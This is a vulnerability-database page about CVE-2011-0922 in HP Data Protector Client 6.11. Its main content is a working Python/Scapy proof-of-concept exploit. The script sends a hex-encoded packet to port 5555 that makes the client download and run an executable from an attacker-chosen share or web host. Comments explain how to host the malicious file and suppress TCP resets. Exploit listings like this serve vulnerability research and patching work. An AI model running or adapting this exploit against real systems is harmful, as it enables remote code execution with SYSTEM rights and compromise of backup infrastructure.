Vulners
Lucene search
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | HP Data Protector Client EXEC_SETUP Code Execution PoC (ZDI-11-056) | 29 May 201100:00 | – | zdt |
| HP Data Protector Client EXEC_CMD Remote Code Execution | 19 Jun 201200:00 | – | zdt |
| HP Data Protector CMD Install Service Vulnerability (msf) | 3 Aug 201300:00 | – | zdt |
 | CVE-2011-0922 | 29 May 201100:00 | – | circl |
 | HP Data Protector Backup Client Service EXEC_SETUP Code Execution (CVE-2011-0922) | 15 May 201100:00 | – | checkpoint_advisories |
| HP Data Protector Backup Client Service Code Execution - Ver2 (CVE-2011-0922) | 5 Jul 201800:00 | – | checkpoint_advisories |
 | CVE-2011-0922 | 9 Feb 201100:00 | – | cve |
 | CVE-2011-0922 | 9 Feb 201100:00 | – | cvelist |
 | HP Data Protector Client - EXEC_CMD Remote Code Execution | 19 Jun 201200:00 | – | exploitdb |
| HP Data Protector - CMD Install Service (Metasploit) | 2 Aug 201300:00 | – | exploitdb |
10
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done.
# Tweak payload to better suit your needs.
#
# Since you're crafting packets with Scapy don't forget to use iptables to block the outbound resets or your host will
# reset your connection after receiving and unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun.
#
# Greetz to all the Exploit-DB Dev Team.
from scapy.all import *
if len(sys.argv) != 2:
print "Usage: ./ZDI-11-056.py <Target IP>"
sys.exit(1)
target = sys.argv[1]
payload = ("\x00\x00\x01\xbe"
"\xff\xfe\x32\x00\x00\x00\x20\x00\x70\x00\x77\x00\x6e\x00\x32\x00"
"\x30\x00\x30\x00\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00"
"\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00"
"\x53\x00\x45\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00"
"\x69\x00\x74\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
"\x20\x00\x00\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00"
"\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00\x32\x00\x30\x00\x30\x00"
"\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00"
"\x62\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00"
"\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
"\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00\x0a\x00\x49\x00\x4e\x00"
"\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00\x41\x00\x54\x00\x49\x00"
"\x4f\x00\x4e\x00\x54\x00\x59\x00\x50\x00\x45\x00\x3d\x00\x22\x00"
"\x43\x00\x6c\x00\x69\x00\x65\x00\x6e\x00\x74\x00\x22\x00\x20\x00"
"\x43\x00\x45\x00\x4c\x00\x4c\x00\x4e\x00\x41\x00\x4d\x00\x45\x00"
"\x3d\x00\x22\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00"
"\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00"
"\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x43\x00\x45\x00\x4c\x00"
"\x4c\x00\x43\x00\x4c\x00\x49\x00\x45\x00\x4e\x00\x54\x00\x4e\x00"
"\x41\x00\x4d\x00\x45\x00\x3d\x00\x22\x00\x73\x00\x65\x00\x63\x00"
"\x75\x00\x72\x00\x6e\x00\x65\x00\x74\x00\x2d\x00\x62\x00\x32\x00"
"\x75\x00\x64\x00\x66\x00\x76\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00"
"\x65\x00\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x41\x00\x4c\x00"
"\x4c\x00\x55\x00\x53\x00\x45\x00\x52\x00\x53\x00\x3d\x00\x35\x00"
"\x20\x00\x49\x00\x4e\x00\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00"
"\x44\x00\x49\x00\x52\x00\x3d\x00\x22\x00\x24\x00\x28\x00\x4f\x00"
"\x4d\x00\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00"
"\x5c\x00\x22\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x47\x00\x52\x00"
"\x41\x00\x4d\x00\x44\x00\x41\x00\x54\x00\x41\x00\x3d\x00\x22\x00"
"\x24\x00\x28\x00\x44\x00\x41\x00\x54\x00\x41\x00\x4f\x00\x4d\x00"
"\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00\x5c\x00"
"\x22\x00\x20\x00\x49\x00\x4e\x00\x45\x00\x54\x00\x50\x00\x4f\x00"
"\x52\x00\x54\x00\x3d\x00\x35\x00\x35\x00\x35\x00\x35\x00\x20\x00"
"\x41\x00\x44\x00\x44\x00\x4c\x00\x4f\x00\x43\x00\x41\x00\x4c\x00"
"\x3d\x00\x63\x00\x6f\x00\x72\x00\x65\x00\x2c\x00\x6a\x00\x61\x00"
"\x76\x00\x61\x00\x67\x00\x75\x00\x69\x00\x20\x00\x4f\x00\x50\x00"
"\x54\x00\x5f\x00\x44\x00\x4e\x00\x53\x00\x43\x00\x48\x00\x45\x00"
"\x43\x00\x4b\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00\x54\x00"
"\x5f\x00\x53\x00\x4b\x00\x49\x00\x50\x00\x49\x00\x4d\x00\x50\x00"
"\x4f\x00\x52\x00\x54\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00"
"\x54\x00\x5f\x00\x4d\x00\x53\x00\x47\x00\x3d\x00\x31\x00\x0a\x00"
"\x00\x00\x00\x00")
ip=IP(dst=target)
SYN=TCP(sport=31337, dport=5555, flags="S")
packet=ip/SYN
SYNACK=sr1(packet)
my_ack = SYNACK.seq + 1
print SYNACK.seq
print my_ack
ACK=TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack)
send(ip/ACK)
PUSH=TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack)
send(ip/PUSH/payload)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2011 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 210
EPSS0.82006